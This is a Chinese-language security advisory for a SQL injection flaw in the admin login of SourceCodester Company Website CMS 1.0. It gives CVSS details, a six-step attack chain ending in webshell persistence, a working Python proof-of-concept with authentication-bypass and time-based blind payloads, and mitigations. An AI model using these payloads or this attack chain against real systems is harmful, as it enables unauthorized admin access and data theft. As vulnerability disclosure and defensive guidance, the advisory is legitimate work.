CVE-2025-13561 | SourceCodester Company Website CMS SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-13561

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Company Website CMS 1.0

漏洞概述

CVE-2025-13561是SourceCodester公司网站内容管理系统（Company Website CMS）1.0版本中的一个高危SQL注入漏洞。该漏洞存在于管理后台登录页面（/admin/index.php），攻击者可通过构造恶意的Username参数值，未经授权即可注入任意SQL语句。由于该漏洞无需认证即可利用，且可通过网络远程触发，因此存在极高的安全风险。攻击者成功利用此漏洞可绕过登录验证机制，获取系统管理权限，访问、篡改或删除数据库中的敏感信息，包括用户账户、企业数据、业务内容等。在某些配置下，攻击者还可能通过SQL注入获取服务器操作系统权限，实现远程代码执行。鉴于该漏洞已公开披露且CVSS评分达到7.3分（高危级别），建议受影响用户立即采取修复措施。

技术细节

该SQL注入漏洞源于/admin/index.php文件中对用户输入的Username参数缺乏有效的输入验证和SQL语句预编译处理。攻击者可在登录表单的Username字段中注入SQL代码，例如使用单引号（'）或UNION SELECT等语句片段，破坏原始SQL查询的逻辑结构。当应用程序将用户输入直接拼接到SQL查询语句中时，恶意SQL代码将被数据库服务器执行。典型的利用方式包括：1）使用OR 1=1等条件语句绕过认证；2）使用UNION语句从其他表提取数据；3）使用BENCHMARK或SLEEP函数进行时间盲注以推断数据内容。由于CVSS向量显示攻击复杂度低（AC:L）且无需认证（PR:N），攻击者可自动化工具（如SQLMap）快速探测和利用该漏洞。防御此类漏洞的标准做法是采用参数化查询（Prepared Statements）或使用ORM框架，确保用户输入不会被解释为SQL代码的一部分。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标网站使用的SourceCodester Company Website CMS 1.0版本，并定位到管理后台入口/admin/index.php

STEP 2

步骤2：漏洞探测

使用自动化工具（如SQLMap）或手动构造SQL注入payload（如单引号'、UNION SELECT等）测试Username参数是否存在SQL注入漏洞

STEP 3

步骤3：认证绕过

通过注入OR 1=1等条件语句或使用UNION语句提取数据库用户信息，绕过登录验证机制获取管理员权限

STEP 4

步骤4：数据窃取

成功登录后台后，访问数据库中的敏感信息，包括用户账户、密码哈希、企业业务数据等

STEP 5

步骤5：权限提升

在某些配置下，利用数据库的高级功能（如MySQL的INTO OUTFILE或xp_cmdshell）获取服务器操作系统权限

STEP 6

步骤6：持久化控制

通过上传webshell或创建后门账户，建立持久化访问通道，便于后续渗透和数据窃取活动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-13561 SQL Injection PoC
# Target: SourceCodester Company Website CMS 1.0
# Endpoint: /admin/index.php
# Vulnerability: Username parameter SQL Injection

target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target.com/admin/index.php"

# Basic authentication bypass using SQL injection
payload_username = "admin' OR '1'='1' -- "
payload_password = "any_password"

data = {
    'Username': payload_username,
    'Password': payload_password
}

print(f"[*] Sending malicious request to {target_url}")
print(f"[*] Payload: {payload_username}")

try:
    response = requests.post(target_url, data=data, timeout=10, allow_redirects=False)
    
    # Check for successful login indicators
    if response.status_code in [200, 302]:
        if 'admin' in response.text.lower() or 'dashboard' in response.text.lower():
            print("[+] Potential authentication bypass detected!")
            print("[+] Admin access may have been achieved")
        else:
            print("[-] No obvious authentication bypass detected")
    else:
        print(f"[-] Unexpected status code: {response.status_code}")
        
except requests.exceptions.RequestException as e:
    print(f"[-] Request failed: {e}")

# Time-based blind SQL injection test
def test_blind_sql_injection(url):
    # Test if SLEEP function is executed (indicating SQL injection)
    blind_payload = "admin' AND SLEEP(5) -- "
    data = {'Username': blind_payload, 'Password': 'test'}
    
    print("[*] Testing time-based blind SQL injection...")
    try:
        response = requests.post(url, data=data, timeout=10)
        if response.elapsed.total_seconds() >= 5:
            print("[+] Blind SQL injection confirmed!")
            return True
    except requests.exceptions.Timeout:
        print("[+] Blind SQL injection confirmed (timeout occurred)!")
        return True
    return False

test_blind_sql_injection(target_url)

影响范围

SourceCodester Company Website CMS 1.0

防御指南

临时缓解措施

在官方修复补丁发布之前，可采取以下临时缓解措施：1）使用Web应用防火墙规则阻止包含SQL关键字（如UNION、SELECT、SLEEP等）的请求；2）限制管理后台的访问IP，仅允许可信IP段访问/admin路径；3）临时关闭管理后台的在线访问，改为通过VPN或内网访问；4）加强对数据库的监控，及时发现异常查询行为；5）定期备份数据库以便发生安全事件时快速恢复。建议持续关注官方安全公告，尽快部署正式修复方案。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13561
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13561
3 Details https://www.cvedetails.com/cve/CVE-2025-13561/
4 VulDB https://vuldb.com/cve/CVE-2025-13561
5 Link https://github.com/miwangdemaoxianzhe/CVE/issues/2
6 Link https://vuldb.com/?ctiid.333326
7 Link https://vuldb.com/?id.333326
8 Link https://vuldb.com/?submit.696684
9 Link https://www.sourcecodester.com/